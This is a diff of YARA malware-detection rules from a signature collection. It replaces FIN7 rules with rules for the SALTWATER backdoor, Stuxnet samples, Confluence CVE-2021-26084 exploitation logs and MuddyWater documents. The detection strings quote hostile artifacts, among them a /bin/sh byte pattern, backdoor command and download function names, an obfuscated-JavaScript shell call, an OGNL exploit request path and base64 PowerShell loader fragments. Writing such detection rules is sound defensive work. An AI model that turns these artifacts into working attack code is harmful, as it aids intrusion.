+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lnx_barracuda_cve_2023_2868.yar#L2-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3f757bc4a6d46be85732fe33dd0a323c5774cbc1f0da2b984c5db14c1362745a"
+		logic_hash = "57e9afb2f6928656242b8257cc3b98ae3b03e38c75ad40b544e3fc6afaea794d"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "995b90281774798a376db67f906a126257d314efc21b03768941f2f819cf61a6"
+		tags = "CVE-2023-2868, FILE"
+		hash1 = "8849a3273e0362c45b4928375d196714224ec22cb1d2df5d029bf57349860347"
 
 	strings:
-		$s1 = "cvzdfhtjkdhbfszngjdng" fullword ascii
-		$s2 = "sdfkjdfjfhgurgvncmnvmfdjdkfjdkfjdf" fullword wide
+		$sc1 = { 00 2D 63 00 2F 62 69 6E 2F 73 68 00 }
+		$s1 = "SSLShell"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and 1 of them
+		uint32be( 0 ) == 0x7f454c46 and uint16( 0x10 ) == 0x0002 and filesize < 5MB and all of them
 }
-rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_4 : FILE
+rule SIGNATURE_BASE_MAL_ELF_SALTWATER_Jun23_1 : CVE_2023_2868 FILE
 {
 	meta:
-		description = "Detects sample from FIN7 report in August 2018"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bead79bb-28c2-59ed-985b-e44b41e7f66a"
-		date = "2018-08-01"
+		description = "Detects SALTWATER malware used in Barracuda ESG exploitations (CVE-2023-2868)"
+		author = "Florian Roth"
+		id = "10a038f6-6096-5d3a-aaf5-db441685102b"
+		date = "2023-06-07"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L142-L157"
+		reference = "https://www.barracuda.com/company/legal/esg-vulnerability"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_lnx_barracuda_cve_2023_2868.yar#L21-L46"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cd8a33c4e4f626d744e03f48e093f6a45223c74088b03185833ece8034614ca4"
-		score = 75
+		logic_hash = "cb35898c0ee726170da93b4364920ac065f083f9f02db8eb5d293b1ce127cb78"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4b5405fc253ed3a89c770096a13d90648eac10a7fb12980e587f73483a07aa4c"
+		tags = "CVE-2023-2868, FILE"
+		hash1 = "601f44cc102ae5a113c0b5fe5d18350db8a24d780c0ff289880cc45de28e2b80"
 
 	strings:
-		$s1 = "c:\\file.dat" fullword wide
-		$s2 = "constructor or from DllMain." fullword ascii
-		$s3 = "lineGetCallIDs" fullword ascii
+		$x1 = "libbindshell.so"
+		$s1 = "ShellChannel"
+		$s2 = "MyWriteAll"
+		$s3 = "CheckRemoteIp"
+		$s4 = "run_cmd"
+		$s5 = "DownloadByProxyChannel"
+		$s6 = "[-] error: popen failed"
+		$s7 = "/home/product/code/config/ssl_engine_cert.pem"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 700KB and all of them
+		uint16( 0 ) == 0x457f and filesize < 6000KB and ( ( 1 of ( $x* ) and 2 of them ) or 3 of them ) or all of them
 }
-rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_5 : FILE
+rule SIGNATURE_BASE_Stuxnet_Malware_1
 {
 	meta:
-		description = "Detects sample from FIN7 report in August 2018"
+		description = "Stuxnet Sample - file malware.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6c810662-9ceb-5c3b-8f83-5a4aa2a5d461"
-		date = "2018-08-01"
+		id = "1f475dc3-ebb3-508f-b696-3d9ea270b13d"
+		date = "2016-07-09"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L159-L173"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stuxnet.yar#L10-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "893e144d86025db750b32ae69964578ec92862face706339a5bafb393e3c7091"
+		logic_hash = "8caa6bddef3c05e572ef342513190832900dcb1a7a56589ed7df48b3c6992ed1"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7789a3d7d05c30b4efaf3f2f5811804daa56d78a9a660968a4f1f9a78a9108a0"
+		hash1 = "9c891edb5da763398969b6aaa86a5d46971bd28a455b20c2067cb512c9f9a0f8"
 
 	strings:
-		$s1 = "x0=%d, y0=%d, x1=%d, y1=%d" fullword ascii
-		$s3 = "sdfkjdfjfhgurgvncmnvmfdjdkfjdkfjdf" fullword wide
+		$op1 = { 8b 45 08 35 dd 79 19 ae 33 c9 8b 55 08 89 02 89 }
+		$op2 = { 74 36 8b 7f 08 83 ff 00 74 2e 0f b7 1f 8b 7f 04 }
+		$op3 = { 74 70 81 78 05 8d 54 24 04 75 1b 81 78 08 04 cd }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		all of them
 }
-
-rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_6 : FILE
+rule SIGNATURE_BASE_Stuxnet_Malware_2 : FILE
 {
 	meta:
-		description = "Detects sample from FIN7 report in August 2018"
+		description = "Stuxnet Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2b2e6b74-5d71-5656-8faf-37c94607d93e"
-		date = "2018-08-01"
+		id = "2865353c-44c5-5280-878b-daadcef017b8"
+		date = "2016-07-09"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L175-L198"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stuxnet.yar#L43-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "33db8e61b6220d9e16191228573d3d375cce9528241dcf1ad74d641f0959f03b"
+		logic_hash = "ecf992f8fd38b1ab3e05bfe05f260bcaf617f168484477aa81acb9b517b9f3e7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1439d301d931c8c4b00717b9057b23f0eb50049916a48773b17397135194424a"
-
-	strings:
-		$s1 = "coreServiceShell.exe" fullword ascii
-		$s2 = "PtSessionAgent.exe" fullword ascii
-		$s3 = "TiniMetI.exe" fullword ascii
-		$s4 = "PwmSvc.exe" fullword ascii
-		$s5 = "uiSeAgnt.exe" fullword ascii
-		$s7 = "LHOST:" fullword ascii
-		$s8 = "TRANSPORT:" fullword ascii
-		$s9 = "LPORT:" fullword ascii
+		hash1 = "63e6b8136058d7a06dfff4034b4ab17a261cdf398e63868a601f77ddd1b32802"
+
+	strings:
+		$s1 = "\\SystemRoot\\System32\\hal.dll" wide
+		$s2 = "http://www.jmicron.co.tw0" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 20KB and ( pe.exports ( "TiniStart" ) or 4 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 70KB and all of them
 }
-rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_7 : FILE
+rule SIGNATURE_BASE_Stuxnet_Dll : FILE
 {
 	meta:
-		description = "Detects sample from FIN7 report in August 2018"
+		description = "Stuxnet Sample - file dll.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "96943654-a6e8-59c0-ab6c-1ab3906a5d05"
-		date = "2018-08-01"
+		id = "92d812a6-2622-56e4-96c5-eb65ab7055b9"
+		date = "2016-07-09"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L200-L214"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stuxnet.yar#L59-L72"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "212bc13d22d7bc6b0ef10ae034ea09c7ea0d0e66afd212fb55c09cf43344c2ec"
+		logic_hash = "0c192153c268fdd330d3b9e2eb0d8383bd50ce6d036409f0cc0c9273ba8201b3"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ce8ce35f85406cd7241c6cc402431445fa1b5a55c548cca2ea30eeb4a423b6f0"
+		hash1 = "9e392277f62206098cf794ddebafd2817483cfd57ec03c2e05e7c3c81e72f562"
 
 	strings:
-		$s1 = "libpng version" fullword ascii
-		$s2 = "sdfkjdfjfhgurgvncmnvmfdjdkfjdkfjdf" fullword wide
+		$s1 = "SUCKM3 FROM EXPLORER.EXE MOTH4FUCKA #@!" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and $s1
 }
-rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_8 : FILE
+rule SIGNATURE_BASE_Stuxnet_Shortcut_To : FILE
 {
 	meta:
-		description = "Detects sample from FIN7 report in August 2018"
+		description = "Stuxnet Sample - file Copy of Shortcut to.lnk"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1eb9810e-2b50-5a93-925e-073bb17e1e6c"
-		date = "2018-08-01"
+		id = "582ab12b-808e-5d5c-ba36-3bb987c4c552"
+		date = "2016-07-09"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L216-L229"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stuxnet.yar#L74-L87"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f15a8dfd3efb094ab73caebe9bffb5735762960445ca421cd49eaa091ecea300"
+		logic_hash = "a8119500d38bcfc60620265386f31899e586f62e1ceeeff365fd0018ab39c30e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d8bda53d7f2f1e4e442a0e1c30a20d6b0ac9c6880947f5dd36f78e4378b20c5c"
+		hash1 = "801e3b6d84862163a735502f93b9663be53ccbdd7f12b0707336fecba3a829a2"
 
 	strings:
-		$s1 = "GetL3st3rr" fullword ascii
+		$x1 = "\\\\.\\STORAGE#Volume#_??_USBSTOR#Disk&Ven_Kingston&Prod_DataTraveler_2.0&Rev_PMAP#5B6B098B97BE&0#{53f56307-b6bf-11d0-94f2-00a0c" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them
+		uint16( 0 ) == 0x004c and filesize < 10KB and $x1
 }
-rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_10 : FILE
+rule SIGNATURE_BASE_Stuxnet_Malware_3 : FILE
 {
 	meta:
-		description = "Detects sample from FIN7 report in August 2018"
+		description = "Stuxnet Sample - file ~WTR4141.tmp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2c6f557e-31d3-5377-a3fa-4f1507f28386"
-		date = "2018-08-01"
+		id = "1b0b301a-bf29-5080-a7d6-4d5f389bdf50"
+		date = "2016-07-09"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L231-L248"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stuxnet.yar#L89-L110"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1d6dba0c858eacea5bd67682a588105a2ff09d10bb60d9888ace07609c9b33de"
+		logic_hash = "d8c546fb74b419d46bab855fa07a55833ab0a23eb4081ce24a5d4ab0e4bf09dc"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8cc02b721683f8b880c8d086ed055006dcf6155a6cd19435f74dd9296b74f5fc"
+		hash1 = "6bcf88251c876ef00b2f32cf97456a3e306c2a263d487b0a50216c6e3cc07c6a"
+		hash2 = "70f8789b03e38d07584f57581363afa848dd5c3a197f2483c6dfa4f3e7f78b9b"
 
 	strings:
-		$c1 = { 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70
-               00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43
-               00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74
-               00 20 00 31 00 20 00 2D 00 20 00 31 00 39 00 }
+		$x1 = "SHELL32.DLL.ASLR." fullword wide
+		$s1 = "~WTR4141.tmp" fullword wide
+		$s2 = "~WTR4132.tmp" fullword wide
+		$s3 = "totalcmd.exe" fullword wide
+		$s4 = "wincmd.exe" fullword wide
+		$s5 = "http://www.realtek.com0" fullword ascii
+		$s6 = "{%08x-%08x-%08x-%08x}" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 150KB and ( $x1 or 3 of ( $s* ) ) ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_APT_FIN7_Sample_EXE_Aug18_1 : FILE
+rule SIGNATURE_BASE_Stuxnet_Malware_4 : FILE
 {
 	meta:
-		description = "Detects FIN7 Sample"
+		description = "Stuxnet Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7c66a234-9dee-5279-b855-892b12d036ff"
-		date = "2018-08-01"
+		id = "fd3fa395-15f1-5a11-9740-03b897e4620b"
+		date = "2016-07-09"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L250-L275"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stuxnet.yar#L112-L128"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "780e2cb9a704e0df0383737928c2cfc8aa5de5a8f3c9dc67de866d5ac73b8402"
+		logic_hash = "a4ad77490d17cf897c4639f0b9f9473267886e99a94b4f506670207497117764"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "608003c2165b0954f396d835882479f2504648892d0393f567e4a4aa90659bf9"
-		hash2 = "deb62514704852ccd9171d40877c59031f268db917c23d00a2f0113dab79aa3b"
-		hash3 = "16de81428a034c7b2636c4a875809ab62c9eefcd326b50c3e629df3b141cc32b"
-		hash4 = "3937abdd1fd63587022ed540a31c58c87c2080cdec51dd24af3201a6310059d4"
-		hash5 = "7789a3d7d05c30b4efaf3f2f5811804daa56d78a9a660968a4f1f9a78a9108a0"
+		hash1 = "0d8c2bcb575378f6a88d17b5f6ce70e794a264cdc8556c8e812f0b5f9c709198"
+		hash2 = "1635ec04f069ccc8331d01fdf31132a4bc8f6fd3830ac94739df95ee093c555c"
 
 	strings:
-		$s1 = "x0=%d, y0=%d, x1=%d, y1=%d" fullword ascii
-		$s2 = "dx=%d, dy=%d" fullword ascii
-		$s3 = "Error with JP2H box size" fullword ascii
-		$co1 = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
-               00 00 00 00 00 00 00 00 00 00 00 2E 63 6F 64 65
-               00 00 00 }
+		$x1 = "\\objfre_w2k_x86\\i386\\guava.pdb" ascii
+		$x2 = "MRxCls.sys" fullword wide
+		$x3 = "MRXNET.Sys" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of ( $s* ) and $co1 at 0x015D
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and 1 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_APT_FIN7_Msdoc_Sep21_1 : FILE
+rule SIGNATURE_BASE_Stuxnet_Maindll_Decrypted_Unpacked
 {
 	meta:
-		description = "Detects MalDocs used by FIN7 group"
+		description = "Stuxnet Sample - file maindll.decrypted.unpacked.dll_"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4fbde087-ec1e-5614-af1e-f342b1766fa2"
-		date = "2021-09-07"
+		id = "7009a41c-0588-5392-ae1c-045e0a5ee56b"
+		date = "2016-07-09"
 		modified = "2023-12-05"
-		reference = "https://www.anomali.com/blog/cybercrime-group-fin7-using-windows-11-alpha-themed-docs-to-drop-javascript-backdoor"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L277-L301"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stuxnet.yar#L130-L150"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ffc91cdad91b8ab24840c6ef1a6c39aad081d986c21a88b3f2ea3ec1bcd3b52b"
-		score = 85
+		logic_hash = "bec740cdb4c1748d0fb546691cf8feb38c0e61adad60c069c5866f5034cb7ed9"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "d60b6a8310373c9b84e6760c24185535"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4c3d7b38339d7b8adf73eaf85f0eb9fab4420585c6ab6950ebd360428af11712"
 
 	strings:
-		$xc1 = { 00 4A 00 6F 00 68 00 6E 00 0B 00 57 00 31 00 30
-               00 50 00 72 00 6F 00 4F 00 66 00 66 00 31 00 36 }
-		$s1 = "word_data.bin" ascii fullword
-		$s2 = "V:\\DOC\\For_JS" ascii
-		$s3 = "HomeCompany" ascii
-		$s4 = "W10ProOff16" ascii
+		$s1 = "%SystemRoot%\\system32\\Drivers\\mrxsmb.sys;%SystemRoot%\\system32\\Drivers\\*.sys" fullword wide
+		$s2 = "<Actions Context=\"%s\"><Exec><Command>%s</Command><Arguments>%s,#%u</Arguments></Exec></Actions>" fullword wide
+		$s3 = "%SystemRoot%\\inf\\oem7A.PNF" fullword wide
+		$s4 = "%SystemRoot%\\inf\\mdmcpq3.PNF" fullword wide
+		$s5 = "%SystemRoot%\\inf\\oem6C.PNF" fullword wide
+		$s6 = "@abf varbinary(4096) EXEC @hr = sp_OACreate 'ADODB.Stream', @aods OUT IF @hr <> 0 GOTO endq EXEC @hr = sp_OASetProperty @" wide
+		$s7 = "STORAGE#Volume#1&19f7e59c&0&" fullword wide
+		$s8 = "view MCPVREADVARPERCON as select VARIABLEID,VARIABLETYPEID,FORMATFITTING,SCALEID,VARIABLENAME,ADDRESSPARAMETER,PROTOKOLL,MAXLIMI" ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and ( 1 of ( $x* ) or 3 of them )
+		6 of them
 }
-rule SIGNATURE_BASE_SUSP_OBFUSC_JS_Sept21_2 : FILE
+rule SIGNATURE_BASE_Stuxnet_S7Hkimdb : FILE
 {
 	meta:
-		description = "Detects JavaScript obfuscation as used in MalDocs by FIN7 group"
+		description = "Stuxnet Sample - file s7hkimdb.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5ab9cd60-077c-5066-bd2f-8da261aae1e0"
-		date = "2021-09-07"
+		id = "e4cb277f-5eee-5405-9d48-d06657392323"
+		date = "2016-07-09"
 		modified = "2023-12-05"
-		reference = "https://www.anomali.com/blog/cybercrime-group-fin7-using-windows-11-alpha-themed-docs-to-drop-javascript-backdoor"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L303-L323"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stuxnet.yar#L152-L188"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "235ff8fe5c033fd90d77ecf9ce80b59be7bf6ae5a2863a1c9365d8b125a7ff3f"
-		score = 65
+		logic_hash = "a44063b6a542eca17f46802e9f644540f1d6b6cb9777c20ef9ea14e44c341a1c"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4071ec265a44d1f0d42ff92b2fa0b30aafa7f6bb2160ed1d0d5372d70ac654bd"
 
 	strings:
-		$s1 = "=new RegExp(String.fromCharCode(" ascii
-		$s2 = ".charCodeAt(" ascii
-		$s3 = ".substr(0, " ascii
-		$s4 = "var shell = new ActiveXObject(" ascii
-		$s5 = "= new Date().getUTCMilliseconds();" ascii
-		$s6 = ".deleteFile(WScript.ScriptFullName);" ascii
+		$x1 = "S7HKIMDX.DLL" fullword wide
+		$op1 = { 8b 45 08 35 dd 79 19 ae 33 c9 8b 55 08 89 02 89 }
+		$op2 = { 74 36 8b 7f 08 83 ff 00 74 2e 0f b7 1f 8b 7f 04 }
+		$op3 = { 74 70 81 78 05 8d 54 24 04 75 1b 81 78 08 04 cd }
 
 	condition:
-		filesize < 6000KB and ( 4 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 40KB and $x1 and all of ( $op* ) )
 }
-rule SIGNATURE_BASE_HKTL_Natbypass_Dec22_1 : T1090 FILE
+rule SIGNATURE_BASE_LOG_EXPL_Confluence_RCE_CVE_2021_26084_Sep21 : LOG CVE_2021_26084
 {
 	meta:
-		description = "Detects NatBypass tool (also used by APT41)"
+		description = "Detects exploitation attempts against Confluence servers abusing a RCE reported as CVE-2021-26084"
 		author = "Florian Roth (Nextron Systems)"
-		id = "54af4d84-72f7-5ec4-b0bf-7ba228fdf508"
-		date = "2022-12-27"
+		id = "bbf98ce4-d32b-541a-b727-bc35c9aaef53"
+		date = "2021-09-01"
 		modified = "2023-12-05"
-		reference = "https://github.com/cw1997/NATBypass"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/hktl_natbypass.yar#L2-L24"
+		reference = "https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_cve_2021_26084_confluence_log.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8af76d7d9d4500dc219090fbd8ca8cd9fd17bfc224f14a411febfd6f75b92206"
-		score = 80
-		quality = 85
-		tags = "T1090, FILE"
-		hash1 = "4550635143c9997d5499d1d4a4c860126ee9299311fed0f85df9bb304dca81ff"
+		logic_hash = "04542570b4814efde3d96ba5be8b5f9fd6e3c51be09f0e8a1c4eba45bfd8f5ff"
+		score = 55
+		quality = 60
+		tags = "LOG, CVE-2021-26084"
 
 	strings:
-		$x1 = "nb -slave 127.0.0.1:3389 8.8.8.8:1997" ascii
-		$x2 = "| Welcome to use NATBypass Ver" ascii
-		$s1 = "main.port2host.func1" ascii fullword
-		$s2 = "start to transmit address:" ascii
-		$s3 = "^(\\d{1,2}|1\\d\\d|2[0-4]\\d|25[0-5])\\.(\\d{1,2}|1\\d\\d|2[0-4]\\d|25[0-5])\\.(\\d{1,2}|1\\d\\d|2[0-4]\\d|25[0-5])\\.(\\d{1,2}|1\\d\\d|2[0-4]\\d|25[0-5])"
+		$xr1 = /isSafeExpression Unsafe clause found in \['[^\n]{1,64}\\u0027/ ascii wide
+		$xs1 = "[util.velocity.debug.DebugReferenceInsertionEventHandler] referenceInsert resolving reference [$!queryString]"
+		$xs2 = "userName: anonymous | action: createpage-entervariables ognl.ExpressionSyntaxException: Malformed OGNL expression: '\\' [ognl.TokenMgrError: Lexical error at line 1"
+		$sa1 = "GET /pages/doenterpagevariables.action"
+		$sb1 = "%5c%75%30%30%32%37"
+		$sb2 = "\\u0027"
+		$sc1 = " ERROR "
+		$sc2 = " | userName: anonymous | action: createpage-entervariables"
+		$re1 = /\[confluence\.plugins\.synchrony\.SynchronyContextProvider\] getContextMap (\n )?-- url: \/pages\/createpage-entervariables\.action/
 
 	condition:
-		filesize < 8000KB and ( 1 of ( $x* ) or 2 of them ) or 3 of them
+		1 of ( $x* ) or ( $sa1 and 1 of ( $sb* ) ) or ( all of ( $sc* ) and $re1 )
 }
-rule SIGNATURE_BASE_Office_Autoopen_Macro : FILE
+rule SIGNATURE_BASE_Muddywater_Mal_Doc_Feb18_1 : FILE
 {
 	meta:
-		description = "Detects an Microsoft Office file that contains the AutoOpen Macro function"
+		description = "Detects malicious document used by MuddyWater"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9774d96c-4d15-5a54-8fe2-e06372d9c4ec"
-		date = "2015-05-28"
+		id = "5f275ee8-c6a9-532b-bc82-b109195171da"
+		date = "2018-02-26"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/general_officemacros.yar#L2-L26"
+		reference = "Internal Research - TI2T"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_muddywater.yar#L10-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "23c834828e7a9ea966e5d7247881bbbf9180b8f08297e36cd36d2ba5f621c70d"
-		score = 40
+		logic_hash = "b675b004f86695821737b7fc05276c8350e44f5822ec458a74658f895ccf7082"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4d00695d5011427efc33c9722c61ced2"
-		hash2 = "63f6b20cb39630b13c14823874bd3743"
-		hash3 = "66e67c2d84af85a569a04042141164e6"
-		hash4 = "a3035716fe9173703941876c2bde9d98"
-		hash5 = "7c06cab49b9332962625b16f15708345"
-		hash6 = "bfc30332b7b91572bfe712b656ea8a0c"
-		hash7 = "25285b8fe2c41bd54079c92c1b761381"
+		hash1 = "3d96811de7419a8c090a671d001a85f2b1875243e5b38e6f927d9877d0ff9b0c"
 
 	strings:
-		$s1 = "AutoOpen" ascii fullword
-		$s2 = "Macros" wide fullword
+		$x1 = "aWV4KFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVuaWNvZGUuR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmco" ascii
+		$x2 = "U1FCdUFIWUFid0JyQUdVQUxRQkZBSGdBY0FCeUFHVUFjd0J6QUdrQWJ3QnVBQ0FBS"
 
 	condition:
-		( uint32be( 0 ) == 0xd0cf11e0 or uint32be( 0 ) == 0x504b0304 ) and all of ( $s* ) and filesize < 300000
+		uint16( 0 ) == 0xcfd0 and filesize < 3000KB and 1 of them
 }
-rule SIGNATURE_BASE_Office_As_MHTML : CVE_2012_0158 FILE
+rule SIGNATURE_BASE_Muddywater_Mal_Doc_Feb18_2 : FILE
 {
 	meta:
-		description = "Detects an Microsoft Office saved as a MHTML file (false positives are possible but rare; many matches on CVE-2012-0158)"
+		description = "Detects malicious document used by MuddyWater"
 		author = "Florian Roth (Nextron Systems)"
-		id = "21c0c3da-7295-54ad-9947-557a3180af3a"
-		date = "2015-05-28"
+		id = "117e1d33-63a3-52c8-acf6-bc61959193db"
+		date = "2018-02-26"
